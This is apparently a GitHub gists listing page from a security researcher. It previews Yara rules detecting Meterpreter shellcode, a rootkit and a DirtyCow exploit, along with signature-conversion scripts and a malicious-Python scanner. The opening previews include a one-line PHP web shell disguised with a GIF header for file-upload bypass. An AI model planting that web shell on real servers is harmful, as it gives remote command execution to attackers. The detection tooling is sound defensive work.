Nong Hoang Tu dmknght
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| dmknght<?php phpinfo();?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GIF89a <?php system($_GET['c']);?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GIF89a <?php phpinfo();?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GIF89a hehe đang làm exam nè |
dmknght
/ parse_windef_sigs.nim
Last active
February 25, 2023 06:23
Parse signatures from extracted WinDef's DB. This script won't extract compressed DB (use WDExtract instead)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import streams | |
| import bitops | |
| import strutils | |
| import std/enumutils | |
| const | |
| db_name = "mpavbase.vdm.extracted" | |
| type |
dmknght
/ clam_hashes_to_yara.nim
Created
January 14, 2023 03:30
A quick nim script to convert ClamAV hashes to Yara rules
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Compile: nim c --opt:speed clam_hashes_to_yara.nim | |
| import strutils | |
| const | |
| clam_db_path = "/home/dmknght/Desktop/performance_comparison/main.hdb" | |
| yr_converted_rule = "/home/dmknght/Desktop/performance_comparison/clam_hashes.yara" | |
| type | |
| HashSig = object |
dmknght
/ meterpreter.yara
Created
December 30, 2022 10:39
Rule to detect Metasploit's meterpreter shellcode
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule elf64_meterpreter_revtcp_raw { | |
| meta: | |
| description = "Detect Meterpreter ELF 64 staged reverse TCP no encoders" | |
| strings: | |
| $ = {6a 22 [4] 0f 05 [10] 6a 29 [8] 0f 05} | |
| condition: | |
| all of them | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import "elf" | |
| /* | |
| When system is infected by this rootkit | |
| all processes load malicious lib (LD_PRELOAD) | |
| It's possible to detect via strings, however, | |
| current Yara version doesn't load ELF header | |
| of mapped file. | |
| */ |
dmknght
/ dirtycow.yara
Last active
October 31, 2022 20:39
A demo of using yara rule to match multiple import functions in ELF file
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import "elf" | |
| /* | |
| ANALYSIS | |
| Example is a compiled DirtyCow Exploit | |
| The binary has multiple unique functions: getpass, getpid, madvise, pthread_create, pthread_join, ptrace, waitpid | |
| Location: section ".dynstr", size 0xfa, Yara type "elf.SHT_STRTAB" | |
| Current ELF module of Yara version (4.2.0) doesn't have built-in function to check multiple functions imported in binary. | |
| This rule file shows an easy way to do it | |
| */ |
dmknght
/ tree_sitter_py_scan.py
Last active
March 13, 2022 02:52
Simple test code to scan malicious py scripts
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Code parser with tree sitter | |
| `sudo pip3 install tree_sitter` | |
| clone parser for each programming language (same dir with code py) `git clone https://github.com/tree-sitter/tree-sitter-python` | |
| create test code like eval(base64.decode(<base64_text>)) | |
| """ | |
| from tree_sitter import Language, Parser |